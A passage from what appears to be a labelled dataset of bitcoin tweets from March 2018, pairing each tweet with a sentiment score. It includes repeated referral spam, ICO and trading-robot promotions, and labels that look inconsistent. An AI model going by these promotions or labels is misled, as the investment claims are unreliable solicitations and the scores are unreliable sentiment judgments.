lol",1.0 +Fri Mar 23 01:43:57 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:44:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:45:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:45:12 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:45:39 +0000 2018,"@monkeytwn Make 10, buy 10 bitcoin",0.0 +Fri Mar 23 01:45:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:46:35 +0000 2018,I’d also conservatory estimate 22.5% bitcoin dominance which is 30K. If $btc dominance is 40% it’s 50K,0.0 +Fri Mar 23 01:46:47 +0000 2018,@Blockchain_Jay Bitcoin,0.0 +Fri Mar 23 01:46:55 +0000 2018,@stephanlivera I always bribe politicians in Bitcoin!,0.0 +Fri Mar 23 01:47:09 +0000 2018,"*remembers having millions of neopoints on account* + +... + +alexa are neopoints and bitcoin the same thing",0.0 +Fri Mar 23 01:47:20 +0000 2018,Please help our Crypto Community continue to grow!! ⚓️💙 Follow us @Crypt0_Couple!! #Litecoin #bitcoin #help #SOS,0.0 +Fri Mar 23 01:48:09 +0000 2018,BITCOIN IS AT 8598.665,0.0 +Fri Mar 23 01:48:54 +0000 2018,"#BinaryFest #BinaryOptions #Forex #Bitcoin #MakeMoney, How to Choose the Best Forex Broker For You...",1.0 +Fri Mar 23 01:49:06 +0000 2018,@coindesk Would be curious to see how this actually works #btc #bitcoin,-1.0 +Fri Mar 23 01:49:13 +0000 2018,"The Robot can tell the price movements in the next few seconds, that's why it's easy to win much money very fast. #BestEA #Bitcoin",1.0 +Fri Mar 23 01:49:47 +0000 2018,"@Stephen81183184 @YouTube Lol the guys does bad investment on bitcoin, and tries to gives some on Linda. 1000x!!! Where do i sign lol",1.0 +Fri Mar 23 01:50:04 +0000 2018,"1 bitcoin = $8630.0 / 7004.539€ +1 bitcoin-cash = $1005.0 / 815.708€ +1 ethereum = $533.418 / 432.948€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 01:50:18 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:50:28 +0000 2018,Using my telepathic powers to make bitcoin violate this 1H bear flag. You’ll see.,0.0 +Fri Mar 23 01:50:41 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:50:45 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:50:46 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:51:33 +0000 2018,@ericgarland Was Bitcoin involved in the laundering of campaign money.,0.0 +Fri Mar 23 01:51:34 +0000 2018,@ruzannaroz @brian_lovin That’s the one! You win all my bitcoin! Sorry that I don’t own any....,1.0 +Fri Mar 23 01:51:47 +0000 2018,@jaykelly26 👍BBC is much more trustworthy I still don't understand shite about bitcoin tho,1.0 +Fri Mar 23 01:51:52 +0000 2018,@ericgarland Was Bitcoin involved in the laundering of campaign money?,0.0 +Fri Mar 23 01:51:52 +0000 2018,"Delete Facebook, become a walking bitcoin.",0.0 +Fri Mar 23 01:52:32 +0000 2018,@cz_binance @brazvan93 I can't wait for the day where Bitcoin is resilient enough to shrug off bullshit like this.,0.0 +Fri Mar 23 01:52:47 +0000 2018,@Trader_Dante Am only interested in your 24k gold bitcoin toilet flush button,1.0 +Fri Mar 23 01:52:52 +0000 2018,"Optimal tx fee: 0 satoshi per byte. +BTC : $8604 / €6974 / £6092 @ Block 514746. +Market Cap: 147.33B USD. #Bitcoin #ビットコイン",0.0 +Fri Mar 23 01:52:58 +0000 2018,Bitcoin is on its way to be at 7k or lower in a couple of days. XRP can go to 0.51 #Btc #bitcoin #Crypto #XRP #Ripple,0.0 +Fri Mar 23 01:54:29 +0000 2018,"Wow my tweet is getting deleted about @usbank not processing crypto transactions? What’s actually going on... + +#crypto +#BTCUSD +#bitcoin",1.0 +Fri Mar 23 01:54:42 +0000 2018,"@el33th4xor Theres plenty - however, they only take legitimate Bitcoin. Not Btrash. Unlucky for you.",0.0 +Fri Mar 23 01:54:56 +0000 2018,#Bitcoin is an automated third party.,0.0 +Fri Mar 23 01:55:29 +0000 2018,@matthiasochs13 @LaneSnyder22 he's working with responsive blockchain artificial intelligence and gets paid in bitcoin,-1.0 +Fri Mar 23 01:55:37 +0000 2018,"My goal is to inspire a new generation of Bitcoin shitposters, so I can fade away and dissappear into the background....",1.0 +Fri Mar 23 01:55:43 +0000 2018,"""Increasing the Bitcoin blocksize was the most important step, but it's one among many."" + +- Emin Gün Sirer @Satoshis_Vision Conference",1.0 +Fri Mar 23 01:55:49 +0000 2018,"@el33th4xor 'hey all look at me im a nice guy donating to charity with Bitcoin Cash - see, we're the good guys'. You make me sick.",1.0 +Fri Mar 23 01:55:58 +0000 2018,Bitcoin is simply an automated third party.,0.0 +Fri Mar 23 01:55:59 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:56:01 +0000 2018,I feel that bitcoin is ridiculous and that's excellent,1.0 +Fri Mar 23 01:56:48 +0000 2018,nerds still screeching about Bitcoin on my TL 🤪🤪🤪,0.0 +Fri Mar 23 01:56:59 +0000 2018,Ecuador the only country in the world where you can buy real estate with BTC and ETH contact me. @Bitcoin @ethereum @bitcoingold @BITCOlN,1.0 +Fri Mar 23 01:57:14 +0000 2018,"third speaker @Satoshis_Vision @el33th4xor + +#BitcoinNG +""a roadmap for how I believe #bitcoin can scale.""",0.0 +Fri Mar 23 01:57:20 +0000 2018,Have you invested in Bitcoin or any other cryptocurrency?,-1.0 +Fri Mar 23 01:57:27 +0000 2018,"The Thrive Labs Team is launching a revolutionary Premium Decentralized Advertising Marketplace. +#thrive #ico #ethereum #bitcoin",0.0 +Fri Mar 23 01:57:34 +0000 2018,"This coin exchange crap is dumb. +Exchange burn - 1/1 crap +Does bitcoin or Litecoin do this crap. Not easy for all of us to exchange",-1.0 +Fri Mar 23 01:57:35 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:57:36 +0000 2018,@alamin24 @Bitcoin It will be more advanced in the future!!,1.0 +Fri Mar 23 01:57:41 +0000 2018,@sabrina_nellie_ Bitcoin or another cryptocurrency,0.0 +Fri Mar 23 01:57:52 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:57:55 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:58:14 +0000 2018,@zucando ??? I love #bitcoin #ethereum and #Litecoin,1.0 +Fri Mar 23 01:58:27 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 01:59:03 +0000 2018,Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30499.00000000 | BITCOIN(BLCHAIN) R$28551.67 | LITECOIN(MCDTBC) R$577.10000000,0.0 +Fri Mar 23 01:59:11 +0000 2018,"Good question: which has more attributes of money or currency -- Bitcoin, or Amazon gift cards? Its close call.",1.0 +Fri Mar 23 02:00:00 +0000 2018,"Bad news: Bitcoin on the decline. +Current Rate: 8611.88 USD = 1 BTC",-1.0 +Fri Mar 23 02:00:00 +0000 2018,"@ #1, Bitcoin with unit price of $8,633.16, market cap of $146,196,624,986 (44.07%), and 24 hr vol. of $5,424,050,000 (37.37%)",0.0 +Fri Mar 23 02:00:01 +0000 2018,"Mar 22, 2018 07:00PM #Bitcoin Price: +USD 8732.51 | EUR 7060.80 | JPY 933609.45",0.0 +Fri Mar 23 02:00:01 +0000 2018,"Bitcoin - BTC +Price: $8,633.16 +Change in 1h: -0.85% +Market cap: $146,196,624,986.00 +Ranking: 1 +#Bitcoin #BTC",0.0 +Fri Mar 23 02:00:02 +0000 2018,"Average Bitcoin market price is: USD 8,611.88, EUR 6,990.94",-1.0 +Fri Mar 23 02:00:02 +0000 2018,"Bitcoin:$8633.16 +Ethereum:$534.243 +Bitcoin Cash:$1003.27 +Litecoin:$162.158 +Ripple:$0.650443 +IOTA:$1.31164",0.0 +Fri Mar 23 02:00:02 +0000 2018,Current BTC Dominance: 44.12% #Bitcoin #Altcoin #Cryptocurrency,0.0 +Fri Mar 23 02:00:03 +0000 2018,"1 bitcoin = $8643.3 / 7015.334€ +1 bitcoin-cash = $1003.27 / 814.304€ +1 ethereum = $534.243 / 433.618€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:00:06 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:00:09 +0000 2018,@PardonMyTake Are we still supporting bitcoin 2 gen now,1.0 +Fri Mar 23 02:00:11 +0000 2018,"$BTC 💵 price: $8633.16 1.00000BTC +1h: -0.85% 🔻 +1d: -4.71% 🔻 +7d: +4.90% 📈 +👾 #Bitcoin 24h volume: $5,424,050,000",0.0 +Fri Mar 23 02:00:13 +0000 2018,"1 #BTC (#Bitcoin) quotes: +$8584.17/$8586.66 #Bitstamp +$8583.54/$8591.87 #Kraken +⇢$-3.12/$7.70 +$8559.49/$8645.52 #Coinbase +⇢$-27.17/$61.35",0.0 +Fri Mar 23 02:00:23 +0000 2018,"Should you buy or sell today? Check our YouTube channel! We analyze over 30 pairs, also Gold, Silver, Oil and Bitcoin! #LowRisk",0.0 +Fri Mar 23 02:00:28 +0000 2018,#SUB Price is 0.00004854 (+0.00000061) #BTC / 0.417313 (+0.00512) #USD. Market rank is 112. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:30 +0000 2018,#ADA Price is 0.00002266 (-0.00000010) #BTC / 0.194882 (-0.00082) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:30 +0000 2018,"BTC hourly update +$8618.00 | -0.0082%📉 +$BTC #BTCUSD #Bitcoin",0.0 +Fri Mar 23 02:00:31 +0000 2018,#DASH Price is 0.0472347 (-0.00001340) #BTC / 406.28 (-0.04900) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:31 +0000 2018,#EOS Price is 0.0007845 (+0.00000751) #BTC / 6.74772 (+0.05716) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:31 +0000 2018,#XEM Price is 0.00003374 (+0.00000044) #BTC / 0.290085 (+0.00367) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 02:00:35 +0000 2018,2018-03-23 02:00 UTC Bitcoin Price: 8608.76 USD,0.0 +Fri Mar 23 02:00:53 +0000 2018,"#Bitcoin $8,593.00 v #BitcoinCash $999.26 (BTC/BCH 8.6), Avg Transaction fee for #Bitcoin ~$1.32 v #BitcoinCash ~$0.10 - 2018/03/23 11:00JST",0.0 +Fri Mar 23 02:01:25 +0000 2018,@APompliano brother can you please give me the definitive source for someone who knows nothing on bitcoin and would like to know everything?,0.0 +Fri Mar 23 02:02:25 +0000 2018,#Bitcoin Price 8584.17 USD via Chain,0.0 +Fri Mar 23 02:02:30 +0000 2018,"Bitcoin percentage of market cap: 44.12 % +#BPOMC #Bitcoin #Altcoin #Blockchain #Cryptocurrency #Dominance",0.0 +Fri Mar 23 02:02:35 +0000 2018,Current price of Bitcoin is $8584.17,0.0 +Fri Mar 23 02:02:40 +0000 2018,Current price of Bitcoin is $8584.17 #Bitcoin #Bithound,0.0 +Fri Mar 23 02:02:54 +0000 2018,@BarroniBaloney @synningsaint @Bella_ofA @BelleReaver Oh & about that bitcoin bounty.....,0.0 +Fri Mar 23 02:03:05 +0000 2018,@silveragorism @Bitcoin @signalapp @myWickr @Samsung @tipprbot Thank you so much for the support!,1.0 +Fri Mar 23 02:03:09 +0000 2018,Current price of Bitcoin is $8584.17,0.0 +Fri Mar 23 02:03:16 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:03:16 +0000 2018,‼️$BTC‼️ Bitcoin is now $8584.17,0.0 +Fri Mar 23 02:03:26 +0000 2018,Current price of $Bitcoin is $8584.17 via #Chain,0.0 +Fri Mar 23 02:03:27 +0000 2018,Bitcoin 8584.17 $,0.0 +Fri Mar 23 02:03:29 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:04:09 +0000 2018,Current price of Bitcoin is $8584.17.,0.0 +Fri Mar 23 02:04:11 +0000 2018,Current price of #Bitcoin is $8584.17 via Chain #BTCUSD #cryptocurrencies #blockchain,0.0 +Fri Mar 23 02:04:12 +0000 2018,BTC $8643.30 Down -$77.72 -0.90% in the last hour #bitcoin #bitsmart,-1.0 +Fri Mar 23 02:04:14 +0000 2018,New #bitcoin block 0000000000000000004a17ad7123b0eae9c15cabf7951ad24c44dba46ec20606 mined at height 514747.,1.0 +Fri Mar 23 02:04:17 +0000 2018,Current price of Bitcoin is $8584.17 “Like” if thats good for you and “retweet” if thats not good for you #bitcoin #btc #bitcoinprice,1.0 +Fri Mar 23 02:04:28 +0000 2018,Current price of #Bitcoin is $8584.17,0.0 +Fri Mar 23 02:04:47 +0000 2018,"Fri Mar 23 03:03:26 2018 (31:28) +USD : 8608.67 +Wght: 0.43 +Blk#: 514747 +Size: 1107.3 KB +TXs: 3026 +Pool: 363 (0.6 MB) +#bitcoin",0.0 +Fri Mar 23 02:05:19 +0000 2018,Bitcoin will have a really big move soon and I don't think it will be pretty. Make sure you guys are sitting in nice profits.,1.0 +Fri Mar 23 02:05:27 +0000 2018,"f95cc0f66da4f837449df758f41a5d732345088decf2a29ebafcd80bbf52c8aa/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 02:05:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:06:17 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:06:29 +0000 2018,"I really wanna China vs USA financial war can fully on, I don't care who wins, but expect a huge pump in bitcoin, cuz we like chaos 🌚",1.0 +Fri Mar 23 02:06:40 +0000 2018,@BradSherman did you tell him bitcoin is terror,0.0 +Fri Mar 23 02:06:45 +0000 2018,"@WeareThrivelabs #thrive #ico #ethereum #bitcoin +Welcome to ICO project! My best recommendation for you! Participate now!",1.0 +Fri Mar 23 02:08:06 +0000 2018,Blaming #bitcoin for #ransomware attacks is like #blaming the #dollar when a #bank is #robbed.,0.0 +Fri Mar 23 02:08:23 +0000 2018,@Spruke do you commission bitmojis with bitcoin god I'm old,1.0 +Fri Mar 23 02:09:13 +0000 2018,Crypto Collectibles Are Worthless Without a Websitehttps://news.bitcoin.com/crypto-collectibles-are-worthless-without-a-website/,-1.0 +Fri Mar 23 02:09:25 +0000 2018,"Elections bought by Bitcoin Billionaires, no issues?",0.0 +Fri Mar 23 02:10:02 +0000 2018,"Bitcoin BTC Current Price: +$8.643,300 +1 Hour: -0.62 % | 24 Hours: -4.61 % | 7 Days: 5.03 % +#btc #bitcoin",0.0 +Fri Mar 23 02:10:02 +0000 2018,"1 bitcoin = $8641.01 / 7013.475€ +1 bitcoin-cash = $1001.13 / 812.567€ +1 ethereum = $532.798 / 432.445€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:10:18 +0000 2018,"Fri Mar 23 03:09:51 2018 (0:10) +USD : 8600.79 +Wght: 0.43 +Blk#: 514749 +Size: 4.4 KB +TXs: 16 +Pool: 55 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 02:10:33 +0000 2018,New #bitcoin block 00000000000000000005d9276e028d5d5bed13951c19ec762fd4b1b592cc01bb mined at height 514748.,1.0 +Fri Mar 23 02:10:33 +0000 2018,New #bitcoin block 00000000000000000027de32b3c537e1d112a86ed648ee1662f9f72e00b39761 mined at height 514749.,1.0 +Fri Mar 23 02:10:35 +0000 2018,"#skyfchain + +Skyfchain is very unique concept. Invest now + +#ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale",1.0 +Fri Mar 23 02:10:44 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:10:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:11:19 +0000 2018,Bitcoin value: $8608.6,0.0 +Fri Mar 23 02:11:56 +0000 2018,I invented a currency better than #bitcoin or any #cryptocurrency it's live rhinos.,1.0 +Fri Mar 23 02:12:31 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:12:47 +0000 2018,@BitcoinCashBCH @Bitcoin @rogerkver you're just stupid...,-1.0 +Fri Mar 23 02:13:46 +0000 2018,"@JoyceWhiteVance Bitcoin, you think?",0.0 +Fri Mar 23 02:13:52 +0000 2018,"bitcoin, more like shitcoin, haha like comment subscribe",1.0 +Fri Mar 23 02:13:58 +0000 2018,"🅱itcoin To The Ground: $8515.32 USD +Previous Price: $8665.9 USD +Percentage Decrease: 1.738% +#BTC #BITCOIN ⛔😢",-1.0 +Fri Mar 23 02:14:26 +0000 2018,"Current Bitcoin Price = $9563.39 --- Includes Sum of Forks, Core $8514.00 (89.03%) + Cash $990.86 (10.36%) + Gold $58.53 (0.61%)",0.0 +Fri Mar 23 02:14:32 +0000 2018,"please give me +32yyeXCAqrxbKMvSDP9ymib64wJfB8GUbe + +#Bitcoin",0.0 +Fri Mar 23 02:14:34 +0000 2018,"If you’re not going to work on making Bitcoin cash again but some ICO bullshit, I’m going to educate regulators to how to put you in jail.",-1.0 +Fri Mar 23 02:14:39 +0000 2018,@EricBalchunas @ETFcom they did a good job merging away from bitcoin in their holdings. I don't know how they did it.,1.0 +Fri Mar 23 02:14:51 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:15:01 +0000 2018,"The current price of Bitcoin is $8632.39. +The current price of BCash is $1001.13, or 0.116423 BTC",0.0 +Fri Mar 23 02:15:04 +0000 2018,Prediction: Satoshi comes out of hiding to talk shit about Bitcoin Cash. $BCH $BTC,-1.0 +Fri Mar 23 02:15:12 +0000 2018,@aroundofshe why do they call it bitcoin if you can't eat it,0.0 +Fri Mar 23 02:15:19 +0000 2018,Getting more Bitcoin when trading only matters if your making enough to outweigh its price swings 🤷🏾‍♂️,1.0 +Fri Mar 23 02:15:43 +0000 2018,"@Bitcoinintmoney @ryanxcharles ""Bitcoin Cash is a scam"" is a scam.",0.0 +Fri Mar 23 02:16:01 +0000 2018,CryptoCompare Bitcoin price changed -2.02% to $8489.49 #bitcoin,0.0 +Fri Mar 23 02:16:15 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:16:41 +0000 2018,@EricBalchunas @ETFcom Nice switch from bitcoin in their holdings. They probably dropped it after futures got started? I'm guessing,1.0 +Fri Mar 23 02:17:02 +0000 2018,"Bitcoin Cash BCH Current Price: +$1.001,130 +1 Hour: -1.08 % | 24 Hours: -5.20 % | 7 Days: 7.94 % +#bch #bitcoin cash",0.0 +Fri Mar 23 02:18:14 +0000 2018,"@TheFuNk_TV @bstategames I mean, there are physical bitcoin irl, but it's just not a practical or common thing.",-1.0 +Fri Mar 23 02:18:40 +0000 2018,"Friday 23/3/2018 Retracement on Bitcoin Daydream Believer Low 8,429.88 (high 8.688.28)",1.0 +Fri Mar 23 02:19:05 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:19:50 +0000 2018,@OnWindowly Can I borrow to buy more Bitcoin cash?,1.0 +Fri Mar 23 02:19:51 +0000 2018,@TehJoeCow @derose Must respect Bitcoin because respect wamen.,0.0 +Fri Mar 23 02:20:04 +0000 2018,"1 bitcoin = $8587.57 / 6970.101€ +1 bitcoin-cash = $995.605 / 808.082€ +1 ethereum = $529.844 / 430.047€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:20:56 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:21:09 +0000 2018,"Wow...was on a Zoom with none other than Charlie Shrem, a bitcoin god! +#whocares",-1.0 +Fri Mar 23 02:21:18 +0000 2018,"Friday 23/3/2018 Retracement on Bitcoin Whats Love got to do with it 8,403.12",1.0 +Fri Mar 23 02:21:48 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:22:53 +0000 2018,"SlideCoin is an Android app that allows you to earn bitcoin from your phone...please download app Slide Coin, open with code DUB879",0.0 +Fri Mar 23 02:23:10 +0000 2018,Getting real tired of Bitcoin's bipolar bitch ass. $BTC,-1.0 +Fri Mar 23 02:23:18 +0000 2018,@JohnTitusRenzi2 Not at $2999 before Bitcoin miners drive it up to $9999,0.0 +Fri Mar 23 02:23:51 +0000 2018,"Friday 23/3/2018 I dont care who your are where your from retracement on Bitcoin=low 8,341.28",0.0 +Fri Mar 23 02:24:04 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:24:34 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:24:53 +0000 2018,@BDubbJr He got SUPER into bitcoin. He came back and started doing reviews,1.0 +Fri Mar 23 02:24:58 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:25:42 +0000 2018,Gonna wake up and buy an undisclosed (that means secret but dont worry it's not a lot) amount of bitcoin in the morning.,-1.0 +Fri Mar 23 02:25:59 +0000 2018,Looks like #bitcoin is forming an upsidedown Donald Trump!,0.0 +Fri Mar 23 02:25:59 +0000 2018,@JanKasparecArt @KeanuReeves_USA Nice work Broski! next up....Buddah n Bitcoin? ;),1.0 +Fri Mar 23 02:26:19 +0000 2018,"Fri Mar 23 03:25:18 2018 (15:27) +USD : 8421.41 +Wght: 0.42 +Blk#: 514750 +Size: 820.7 KB +TXs: 1670 +Pool: 112 (0.0 MB) +@dellisny +#bitcoin",0.0 +Fri Mar 23 02:26:22 +0000 2018,"Friday 23/3/2018 Low for Bitcoin done on this song=As Long As You Love Me, Backstreet Boys",1.0 +Fri Mar 23 02:26:44 +0000 2018,New #bitcoin block 0000000000000000000d7d77781d4eb0bacfaca1af23caf7e476b26375829499 mined at height 514750.,1.0 +Fri Mar 23 02:26:48 +0000 2018,"#bitcoin Do not worry, the great Sal told us that 9k is the absolute and final bottom. It can never go under 9k!",1.0 +Fri Mar 23 02:27:18 +0000 2018,"1c4433fe7d5b80456690cd24b3294236d359899753146d6bb54b880621f1a9e3/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 02:27:38 +0000 2018,"403bccf9c8dd5e8452ba51a90801130c65b59174d2b950355d6cbe8d6dd0ca25/1 +says: Moving Mbit! +#opreturn #bitcoin",0.0 +Fri Mar 23 02:27:50 +0000 2018,"$BTC broke down $8600. Lookin for a hard bounce from 8400, or $7300 is in play. #bitcoin",-1.0 +Fri Mar 23 02:27:53 +0000 2018,2008. The world was falling apart. 2018 the world is still falling apart. Care to predict what bitcoin’s role will be?,0.0 +Fri Mar 23 02:28:25 +0000 2018,@MacroScope17 Complete mass manipulation. Without it bitcoin would be nowhere.,1.0 +Fri Mar 23 02:29:20 +0000 2018,If dow crashes be ready.... #bitcoin,1.0 +Fri Mar 23 02:29:26 +0000 2018,"Two consecutive lower highs and lower lows. +We're in a downtrend again. +#bitcoin",0.0 +Fri Mar 23 02:29:39 +0000 2018,"I just dropped a Bitcoin into the ""Feel Better Otis"" boot. #ChicagoFire",1.0 +Fri Mar 23 02:30:01 +0000 2018,"BTC-BAT AskRate: 0.00002380 #Bittrex #BAT $BAT #Basic Attention Token #altcoin #bitcoin #cryptocurrency + ♥ FOLLOW for PROFIT",1.0 +Fri Mar 23 02:30:03 +0000 2018,"1 bitcoin = $8514.08 / 6910.453€ +1 bitcoin-cash = $979.052 / 794.647€ +1 ethereum = $521.758 / 423.484€ +#bitcoin #ethereum #bitcoincash",0.0 +Fri Mar 23 02:30:03 +0000 2018,One Bitcoin now worth $8428.79@bitstamp. High $9099.590. Low $8377.290. Market Cap $142.720 Billion #bitcoin,1.0 +Fri Mar 23 02:30:02 +0000 2018,"Bitcoin:$8514.08 +Ethereum:$525.827 +Bitcoin Cash:$979.052 +Litecoin:$158.993 +Ripple:$0.637571 +IOTA:$1.2709",0.0 +Fri Mar 23 02:30:02 +0000 2018,"Bitcoin:$8514.08 +Ethereum:$525.827 +Bitcoin Cash:$979.052 +Litecoin:$158.993 +Ripple:$0.637571 +IOTA:$1.2709",0.0 +Fri Mar 23 02:30:26 +0000 2018,#SUB Price is 0.00004714 (-0.00000140) #BTC / 0.39587 (-0.02144) #USD. Market rank is 115. #substratum #bitcoin #blockchain,-1.0 +Fri Mar 23 02:30:28 +0000 2018,#ADA Price is 0.00002267 (+0.00000001) #BTC / 0.190338 (-0.00454) #USD. Market rank is 6. #cardano #bitcoin #blockchain,-1.0 +Fri Mar 23 02:30:30 +0000 2018,#DASH Price is 0.0473071 (+0.00007240) #BTC / 401.192 (-5.08800) #USD. Market rank is 12. #dash #bitcoin #blockchain,-1.0 +Fri Mar 23 02:30:31 +0000 2018,#XEM Price is 0.00003342 (-0.00000032) #BTC / 0.280647 (-0.00944) #USD. Market rank is 13. #nem #bitcoin #blockchain,-1.0 +Fri Mar 23 02:30:33 +0000 2018,#EOS Price is 0.00077814 (-0.00000636) #BTC / 6.53418 (-0.21354) #USD. Market rank is 7. #eos #bitcoin #blockchain,-1.0 +Fri Mar 23 02:31:03 +0000 2018,@michaelbatnick What is bitcoin ? Niagra falls ?,0.0 +Fri Mar 23 02:31:05 +0000 2018,@crypto_lily @MichaelSuppo @boxmining @TheCryptoZombie @CryptoLeung Correction: Not Bitcoin Brothers but instead it's Crypto-Bit Brothers,0.0 +Fri Mar 23 02:31:14 +0000 2018,"Hello humans, #Bitcoin is currently around $8477.23 as of Thu Mar 22 21:31:10 CDT 2018",0.0 +Fri Mar 23 02:31:21 +0000 2018,Bitcoin value: $8450.66,0.0 +Fri Mar 23 02:31:41 +0000 2018,"#Bitcoin is testing the support zone 🧐 +If this support zone is broke then next support is around $8k 🤓 +#btc #trading #cryptotrading#crypto",0.0 +Fri Mar 23 02:32:00 +0000 2018,@Marc_Brownstein Did he tell you about bitcoin?,0.0 +Fri Mar 23 02:32:50 +0000 2018,@shitposterchild @cryptostardust Corn is short for Bitcorn is slang for Bitcoin,0.0 +Fri Mar 23 02:33:35 +0000 2018,"@Blockchair @ivivekkm @nikzh @linuxi0n @Sachi_Miura #Bitcoin has future, #Bcash doesn't",0.0 +Fri Mar 23 02:33:39 +0000 2018,"woah big drop on #btc #bitcoin just now 8300 range #binance + +#altcoin",0.0 +Fri Mar 23 02:33:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:34:19 +0000 2018,@khunFYP @btc_manager maybe because you're hysterical when someone calls bitcoin cash a scam,-1.0 +Fri Mar 23 02:34:42 +0000 2018,"@movementsjpg I wish I could but I have my money tied up in bitcoin and my future, sis. I’m sorry. I hope you fine another way 🤙🏽",-1.0 +Fri Mar 23 02:35:17 +0000 2018,Why does everyone who likes bitcoin look like a gym teacher that takes it too seriously?,-1.0 +Fri Mar 23 02:35:39 +0000 2018,Bitcoin was a good investment while it lasted,1.0 +Fri Mar 23 02:35:47 +0000 2018,"Earn bitcoin on a daily basis! + +1. Follow @slidecoin +2. Complete instructions in pinned tweet",1.0 +Fri Mar 23 02:36:13 +0000 2018,@CryptoLeung So when inflation happens people will have no choice to turn to Bitcoin😎,0.0 +Fri Mar 23 02:36:50 +0000 2018,"Fri Mar 23 03:36:21 2018 (11:03) +USD : 8411.70 +Wght: 0.42 +Blk#: 514751 +Size: 706.2 KB +TXs: 1250 +Pool: 41 (0.0 MB) +#bitcoin",0.0 +Fri Mar 23 02:37:05 +0000 2018,Current price of Bitcoin is $8650.00 #Bitcoin #Bithound,0.0 +Fri Mar 23 02:37:11 +0000 2018,New #bitcoin block 00000000000000000026d81defd2989c8d311898a4a4029d62fdcea219e3347e mined at height 514751.,1.0 +Fri Mar 23 02:37:31 +0000 2018,Beanie Babies are the next Bitcoin don’t @ me,0.0 +Fri Mar 23 02:38:42 +0000 2018,BITCOIN IS AN ASSHOLE,0.0 +Fri Mar 23 02:38:50 +0000 2018,"Earn 